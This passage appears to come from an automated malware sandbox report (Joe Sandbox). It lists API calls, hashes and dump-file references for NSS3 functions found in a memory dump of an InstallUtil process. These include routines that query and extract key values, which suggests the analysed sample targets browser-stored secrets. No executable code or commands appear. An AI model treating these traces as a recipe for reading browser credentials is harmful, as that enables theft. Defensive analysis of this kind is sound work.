                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CriticalSectionUnlockValue$AllocateArenaEnterLeave
                                                                                                                  • String ID: KRAM
                                                                                                                  • API String ID: 4127063985-3815160215
                                                                                                                  • Opcode ID: edcef2a5144e37ed94c356a66df5840db6be059b9c8be0dec7c2b3563821f808
                                                                                                                  • Instruction ID: 8d596a2c018d89058193bde753528e0e39ef23341c0bc4cd7895d6fe53002cdd
                                                                                                                  • Opcode Fuzzy Hash: edcef2a5144e37ed94c356a66df5840db6be059b9c8be0dec7c2b3563821f808
                                                                                                                  • Instruction Fuzzy Hash: 7E2130B16056018FD700AF79C588559BBF4FF56308F0589BADC88CBB11EB35D886CB92
                                                                                                                  Function 6C778E80 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 71COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • PK11_GetInternalKeySlot.NSS3(?,?,?,6C792E62,?,?,?,?,?,?,?,00000000,?,?,?,6C764F1C), ref: 6C778EA2
                                                                                                                    • Part of subcall function 6C79F820: free.MOZGLUE(6A1B7500,2404110F,?,?), ref: 6C79F854
                                                                                                                    • Part of subcall function 6C79F820: free.MOZGLUE(FFD3F9E8,2404110F,?,?), ref: 6C79F868
                                                                                                                    • Part of subcall function 6C79F820: DeleteCriticalSection.KERNEL32(04C4841B,2404110F,?,?), ref: 6C79F882
                                                                                                                    • Part of subcall function 6C79F820: free.MOZGLUE(04C483FF,?,?), ref: 6C79F889
                                                                                                                    • Part of subcall function 6C79F820: DeleteCriticalSection.KERNEL32(CCCCCCDF,2404110F,?,?), ref: 6C79F8A4
                                                                                                                    • Part of subcall function 6C79F820: free.MOZGLUE(CCCCCCC3,?,?), ref: 6C79F8AB
                                                                                                                    • Part of subcall function 6C79F820: DeleteCriticalSection.KERNEL32(280F1108,2404110F,?,?), ref: 6C79F8C9
                                                                                                                    • Part of subcall function 6C79F820: free.MOZGLUE(280F10EC,?,?), ref: 6C79F8D0
                                                                                                                  • PK11_IsLoggedIn.NSS3(?,?,?,6C792E62,?,?,?,?,?,?,?,00000000,?,?,?,6C764F1C), ref: 6C778EC3
                                                                                                                  • TlsGetValue.KERNEL32(?,?,?,6C792E62,?,?,?,?,?,?,?,00000000,?,?,?,6C764F1C), ref: 6C778EDC
                                                                                                                  • EnterCriticalSection.KERNEL32(?,?,?,?,6C792E62,?,?,?,?,?,?,?,00000000,?,?), ref: 6C778EF1
                                                                                                                  • PR_Unlock.NSS3 ref: 6C778F20
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: free$CriticalSection$Delete$K11_$EnterInternalLoggedSlotUnlockValue
                                                                                                                  • String ID: b.yl
                                                                                                                  • API String ID: 1978757487-943809714
                                                                                                                  • Opcode ID: a4ca42e3b2594609cc20454f5898f88a67d75ac8b3a5b392d9356e0222b76851
                                                                                                                  • Instruction ID: 545786e3d416de1d3093b670022b67663d19cb54f2c5814767692403edbd9f33
                                                                                                                  • Opcode Fuzzy Hash: a4ca42e3b2594609cc20454f5898f88a67d75ac8b3a5b392d9356e0222b76851
                                                                                                                  • Instruction Fuzzy Hash: FA21A0709096099FCB10AF29D688599BBF4FF49318F01456EEC989BB41D730E854CBE2
                                                                                                                  Function 6C7A8970 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • TlsGetValue.KERNEL32(?,00000000,6C7561C4,?,6C755639,00000000), ref: 6C7A8991
                                                                                                                  • TlsGetValue.KERNEL32(?,?,?,?,?,6C755639,00000000), ref: 6C7A89AD
                                                                                                                  • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,6C755639,00000000), ref: 6C7A89C6
                                                                                                                  • PR_WaitCondVar.NSS3 ref: 6C7A89F7
                                                                                                                  • PR_Unlock.NSS3(?,?,?,?,?,?,?,6C755639,00000000), ref: 6C7A8A0C
                                                                                                                    • Part of subcall function 6C7407A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C6D204A), ref: 6C7407AD
                                                                                                                    • Part of subcall function 6C7407A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C6D204A), ref: 6C7407CD
                                                                                                                    • Part of subcall function 6C7407A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C6D204A), ref: 6C7407D6
                                                                                                                    • Part of subcall function 6C7407A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C6D204A), ref: 6C7407E4
                                                                                                                    • Part of subcall function 6C7407A0: TlsSetValue.KERNEL32(00000000,?,6C6D204A), ref: 6C740864
                                                                                                                    • Part of subcall function 6C7407A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C740880
                                                                                                                    • Part of subcall function 6C7407A0: TlsSetValue.KERNEL32(00000000,?,?,6C6D204A), ref: 6C7408CB
                                                                                                                    • Part of subcall function 6C7407A0: TlsGetValue.KERNEL32(?,?,6C6D204A), ref: 6C7408D7
                                                                                                                    • Part of subcall function 6C7407A0: TlsGetValue.KERNEL32(?,?,6C6D204A), ref: 6C7408FB
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Value$calloc$CondCriticalEnterSectionUnlockWait
                                                                                                                  • String ID: 9Vul
                                                                                                                  • API String ID: 2759447159-3524958965
                                                                                                                  • Opcode ID: ec9fb2556207df9fd8421f7243f96e237cc8f11b630a1843398c5bedd74af747
                                                                                                                  • Instruction ID: 8bf497ebb49210be7b7782677ac952cb0408dad52c2ac2e590ec8f39390fec34
                                                                                                                  • Opcode Fuzzy Hash: ec9fb2556207df9fd8421f7243f96e237cc8f11b630a1843398c5bedd74af747
                                                                                                                  • Instruction Fuzzy Hash: 07216DB49047458FDB11AFB8C6882A9BBF4FF06358F114676DC989B601E730D896CBD2
                                                                                                                  Function 6C7FA540 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 65COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 6C7FA390: PR_SetError.NSS3(FFFFE005,00000000), ref: 6C7FA415
                                                                                                                  • PK11_ExtractKeyValue.NSS3(00000000), ref: 6C7FA5AC
                                                                                                                  • memcpy.VCRUNTIME140(?,?,?), ref: 6C7FA5BF
                                                                                                                  • PK11_FreeSymKey.NSS3(00000000), ref: 6C7FA5C8
                                                                                                                    • Part of subcall function 6C79ADC0: TlsGetValue.KERNEL32(?,6C77CDBB,?,6C77D079,00000000,00000001), ref: 6C79AE10
                                                                                                                    • Part of subcall function 6C79ADC0: EnterCriticalSection.KERNEL32(?,?,6C77CDBB,?,6C77D079,00000000,00000001), ref: 6C79AE24
                                                                                                                    • Part of subcall function 6C79ADC0: PR_Unlock.NSS3(?,?,?,?,?,?,6C77D079,00000000,00000001), ref: 6C79AE5A
                                                                                                                    • Part of subcall function 6C79ADC0: memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6C77CDBB,?,6C77D079,00000000,00000001), ref: 6C79AE6F
                                                                                                                    • Part of subcall function 6C79ADC0: free.MOZGLUE(85145F8B,?,?,?,?,6C77CDBB,?,6C77D079,00000000,00000001), ref: 6C79AE7F
                                                                                                                    • Part of subcall function 6C79ADC0: TlsGetValue.KERNEL32(?,6C77CDBB,?,6C77D079,00000000,00000001), ref: 6C79AEB1
                                                                                                                    • Part of subcall function 6C79ADC0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C77CDBB,?,6C77D079,00000000,00000001), ref: 6C79AEC9
                                                                                                                  • PK11_FreeSymKey.NSS3(00000000), ref: 6C7FA5D9
                                                                                                                  • PR_SetError.NSS3(FFFFD04C,00000000), ref: 6C7FA5E8
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: K11_Value$CriticalEnterErrorFreeSection$ExtractUnlockfreememcpymemset
                                                                                                                  • String ID: *@
                                                                                                                  • API String ID: 2660593509-1483644743
                                                                                                                  • Opcode ID: 394995ed3c0cc6c170694d3b35e41cb52fa78ab5b4dd5cd60935b080211310db
                                                                                                                  • Instruction ID: 17e26155f9995dc0911a9d535d046d572e964f79886f35d92801e9541843fe60
                                                                                                                  • Opcode Fuzzy Hash: 394995ed3c0cc6c170694d3b35e41cb52fa78ab5b4dd5cd60935b080211310db
                                                                                                                  • Instruction Fuzzy Hash: 1F2127B1C043049BC7019F29EE4569FBBF4AF9972CF054228EC6823740E770E6598BD2
                                                                                                                  Function 6C862C80 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61stringCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • PR_EnterMonitor.NSS3 ref: 6C862CA0
                                                                                                                  • PR_ExitMonitor.NSS3 ref: 6C862CBE
                                                                                                                  • calloc.MOZGLUE(00000001,00000014), ref: 6C862CD1
                                                                                                                  • strdup.MOZGLUE(?), ref: 6C862CE1
                                                                                                                  • PR_LogPrint.NSS3(Loaded library %s (static lib),00000000), ref: 6C862D27
                                                                                                                  Strings
                                                                                                                  • Loaded library %s (static lib), xrefs: 6C862D22
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Monitor$EnterExitPrintcallocstrdup
                                                                                                                  • String ID: Loaded library %s (static lib)
                                                                                                                  • API String ID: 3511436785-2186981405
                                                                                                                  • Opcode ID: b23bd490d67bbc74ced8691c39ca292c163e879cb552bcb3927328fbc8bff1d8
                                                                                                                  • Instruction ID: 24f050f795471f09db57eaa8ecbf435faebfbd7aab937fb26c76c9a718e50741
                                                                                                                  • Opcode Fuzzy Hash: b23bd490d67bbc74ced8691c39ca292c163e879cb552bcb3927328fbc8bff1d8
                                                                                                                  • Instruction Fuzzy Hash: 311138B17002059FEB309F1AD908A6637B5AB4634DF04897DD809CBF41D735E808CBD1
                                                                                                                  Function 6C7568E0 Relevance: 10.6, APIs: 7, Instructions: 56COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • TlsGetValue.KERNEL32 ref: 6C7568FB
                                                                                                                  • EnterCriticalSection.KERNEL32 ref: 6C756913
                                                                                                                  • PORT_FreeArena_Util.NSS3 ref: 6C75693E
                                                                                                                  • PR_Unlock.NSS3 ref: 6C756946
                                                                                                                  • DeleteCriticalSection.KERNEL32 ref: 6C756951
                                                                                                                  • free.MOZGLUE ref: 6C75695D
                                                                                                                  • PR_Unlock.NSS3 ref: 6C756968
                                                                                                                    • Part of subcall function 6C7FDD70: TlsGetValue.KERNEL32 ref: 6C7FDD8C
                                                                                                                    • Part of subcall function 6C7FDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C7FDDB4
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CriticalSection$UnlockValue$Arena_DeleteEnterFreeLeaveUtilfree
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1628394932-0
                                                                                                                  • Opcode ID: d95967200f50e4019f495dbd734c9bd73200755a8c9c3b75968d863369b97fb7
                                                                                                                  • Instruction ID: 2e8ff652c9b0d5b09551221fd9a7f9e1c24617f1d79188823302fee3fa329e4b
                                                                                                                  • Opcode Fuzzy Hash: d95967200f50e4019f495dbd734c9bd73200755a8c9c3b75968d863369b97fb7
                                                                                                                  • Instruction Fuzzy Hash: 721167B06046459BDB00AFB8C18856EBBF4BF02248F01453CD898DB701EB31D499CBD2
                                                                                                                  Function 6C7B0FF0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C7587ED,00000800,6C74EF74,00000000), ref: 6C7B1000
                                                                                                                  • PR_NewLock.NSS3(?,00000800,6C74EF74,00000000), ref: 6C7B1016
                                                                                                                    • Part of subcall function 6C8198D0: calloc.MOZGLUE(00000001,00000084,6C740936,00000001,?,6C74102C), ref: 6C8198E5
                                                                                                                  • PL_InitArenaPool.NSS3(00000000,security,6C7587ED,00000008,?,00000800,6C74EF74,00000000), ref: 6C7B102B
                                                                                                                  • TlsGetValue.KERNEL32(00000000,?,?,6C7587ED,00000800,6C74EF74,00000000), ref: 6C7B1044
                                                                                                                  • free.MOZGLUE(00000000,?,00000800,6C74EF74,00000000), ref: 6C7B1064
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: calloc$ArenaInitLockPoolValuefree
                                                                                                                  • String ID: security
                                                                                                                  • API String ID: 3379159031-3315324353
                                                                                                                  • Opcode ID: 016384d154fe138f2beeffc98db3b1d58218abeda1298723e80b8e402bfdf5b5
                                                                                                                  • Instruction ID: 3356bfd009f1cde68b338c229435d6a7815010611107f39ffce956e9c45b79e0
                                                                                                                  • Opcode Fuzzy Hash: 016384d154fe138f2beeffc98db3b1d58218abeda1298723e80b8e402bfdf5b5
                                                                                                                  • Instruction Fuzzy Hash: 5D014471A002509BE7302F3DAE08B5A3AB8BF17788F010535E808E7E52EB71C214DBD2
                                                                                                                  Function 6C7E0570 Relevance: 10.5, APIs: 7, Instructions: 47COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • DeleteCriticalSection.KERNEL32(6C7CC89B,FFFFFE80,?,6C7CC89B), ref: 6C7E058B
                                                                                                                  • free.MOZGLUE(?,?,6C7CC89B), ref: 6C7E0592
                                                                                                                  • PR_SetError.NSS3(FFFFE09A,00000000,FFFFFE80,?,6C7CC89B), ref: 6C7E05AE
                                                                                                                  • PR_SetError.NSS3(FFFFE09A,00000000,FFFFFE80,?,6C7CC89B), ref: 6C7E05C2
                                                                                                                  • DeleteCriticalSection.KERNEL32(6C7CC89B,?,6C7CC89B), ref: 6C7E05D8
                                                                                                                  • free.MOZGLUE(?,?,6C7CC89B), ref: 6C7E05DF
                                                                                                                  • PR_SetError.NSS3(FFFFE09A,00000000,?,6C7CC89B), ref: 6C7E05FB
                                                                                                                    • Part of subcall function 6C7FC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C7FC2BF
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Error$CriticalDeleteSectionfree$Value
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1757055810-0
                                                                                                                  • Opcode ID: f419719aaa8e4e6f76510ed4c2867302494429ce2949608c347fbb7c271e717c
                                                                                                                  • Instruction ID: 7929649fe59c382153626999292cd000c37016c7617a3dfae2a2ae7f7485183f
                                                                                                                  • Opcode Fuzzy Hash: f419719aaa8e4e6f76510ed4c2867302494429ce2949608c347fbb7c271e717c
                                                                                                                  • Instruction Fuzzy Hash: C601FCB2F055609BEE30AFE49D0DF4D3B78A70A31DF040030E50656B41DB69A119C7D9
                                                                                                                  Function 6C7F2E50 Relevance: 9.3, APIs: 6, Instructions: 251COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • memcpy.VCRUNTIME140(?,?,00000000), ref: 6C7F3046
                                                                                                                    • Part of subcall function 6C7DEE50: PR_SetError.NSS3(FFFFE013,00000000), ref: 6C7DEE85
                                                                                                                  • PK11_AEADOp.NSS3(?,00000004,?,?,?,?,?,00000000,?,B8830845,?,?,00000000,6C7C7FFB), ref: 6C7F312A
                                                                                                                  • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C7F3154
                                                                                                                  • PR_SetError.NSS3(FFFFE001,00000000), ref: 6C7F2E8B
                                                                                                                    • Part of subcall function 6C7FC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C7FC2BF
                                                                                                                    • Part of subcall function 6C7DF110: PR_SetError.NSS3(FFFFE013,00000000,00000000,0000A48E,00000000,?,6C7C9BFF,?,00000000,00000000), ref: 6C7DF134
                                                                                                                  • memcpy.VCRUNTIME140(8B3C75C0,?,6C7C7FFA), ref: 6C7F2EA4
                                                                                                                  • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C7F317B
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Error$memcpy$K11_Value
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2334702667-0
                                                                                                                  • Opcode ID: a8c21954caca24bfcf140a78b34b5add1d12dca719b0de398ee07f33dc422a18
                                                                                                                  • Instruction ID: 6a30544ff9355d3b82bdfe0390105716dcc40c1e21dfb29e51b5caf7d8a426fd
                                                                                                                  • Opcode Fuzzy Hash: a8c21954caca24bfcf140a78b34b5add1d12dca719b0de398ee07f33dc422a18
                                                                                                                  • Instruction Fuzzy Hash: E2A1CE71A002189FDB24CF54CD84BEAB7B5EF49308F0480A9ED596B741E731AE46CF92
                                                                                                                  Function 6C7AA970 Relevance: 9.3, APIs: 6, Instructions: 251COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 646df92953553762ac53b891ad914091a1e674d455b5404cd66c5ebf4ab80ea0
                                                                                                                  • Instruction ID: 858b83cbcde75391630b729214d4853aa2e964cec52fdfa72db55d6b69b16d48
                                                                                                                  • Opcode Fuzzy Hash: 646df92953553762ac53b891ad914091a1e674d455b5404cd66c5ebf4ab80ea0
                                                                                                                  • Instruction Fuzzy Hash: 55917130D081584FCB258E998A917DEB7B5AF4A32CF1483F9C5999BA01D6318E87CFD1
                                                                                                                  Function 6C7BED00 Relevance: 9.2, APIs: 6, Instructions: 228memoryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • PORT_ArenaAlloc_Util.NSS3(?,00000000), ref: 6C7BED6B
                                                                                                                  • PORT_Alloc_Util.NSS3(00000000), ref: 6C7BEDCE
                                                                                                                    • Part of subcall function 6C7B0BE0: malloc.MOZGLUE(6C7A8D2D,?,00000000,?), ref: 6C7B0BF8
                                                                                                                    • Part of subcall function 6C7B0BE0: TlsGetValue.KERNEL32(6C7A8D2D,?,00000000,?), ref: 6C7B0C15
                                                                                                                  • free.MOZGLUE(00000000,?,?,?,?,6C7BB04F), ref: 6C7BEE46
                                                                                                                  • PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6C7BEECA
                                                                                                                  • PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6C7BEEEA
                                                                                                                  • PORT_ArenaAlloc_Util.NSS3(?,00000008), ref: 6C7BEEFB
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Alloc_Util$Arena$Valuefreemalloc
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3768380896-0
                                                                                                                  • Opcode ID: 2e66947b5033f199d53de4bcaf0aa2514003f92588b587c0d8de1040128ce8c9
                                                                                                                  • Instruction ID: fed4f8474542dd064b9741312573bbb488397a7bf4714780dab1efef348f0afd
                                                                                                                  • Opcode Fuzzy Hash: 2e66947b5033f199d53de4bcaf0aa2514003f92588b587c0d8de1040128ce8c9
